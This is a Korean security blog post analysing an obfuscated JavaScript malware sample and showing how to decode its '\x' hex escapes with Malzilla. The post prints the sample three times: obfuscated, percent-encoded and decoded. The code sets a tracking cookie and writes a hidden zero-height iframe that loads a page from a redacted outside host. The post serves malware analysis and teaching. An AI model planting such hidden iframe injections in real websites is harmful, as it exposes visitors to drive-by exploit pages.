본문 바로가기
Information Security/Malware

Hexdecimal Obfuscation #02

by hakawati 2013. 6. 19.

개요

두번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. \x 구분자 기호는 자바스크립트 엔진이 사용하는 16진수 인식 기호다. 이러한 이유로 자바스크립트 함수 까지도 난독화가 가능하다.

if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
    var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
    aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}

분석

"%" 형태의 16진수 난독화라면 Malzilla에서 바로 풀리지만, "\x" 난독화는 바로 풀리지 않기 때문에 다음과 같이 "\x"를 "%"로 치환하여 난독화 해제를 할 수 있다.

if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
    var aWdHMqss1 = new window["%44%61%74%65"]();
    aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
    window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
    window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}
if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
    var aWdHMqss1 = new window["Date"]();
    aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
    window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
    window["document"]["write"]("<iframe src="http://****************/js/cookie.html" width="116" height="0" frameborder="0">");
}


'Information Security > Malware' 카테고리의 다른 글

Deobfuscation 사이트  (0) 2013.07.11
Unicode Obfuscated  (0) 2013.06.24
Hexdecimal Obfuscation #02  (0) 2013.06.19
Vbscript Obfuscated  (2) 2013.06.19
Kaixin Exploit Tookit(Yszz 0.13)  (2) 2013.06.13
Gondad EK 최근 추세  (1) 2013.06.12

댓글0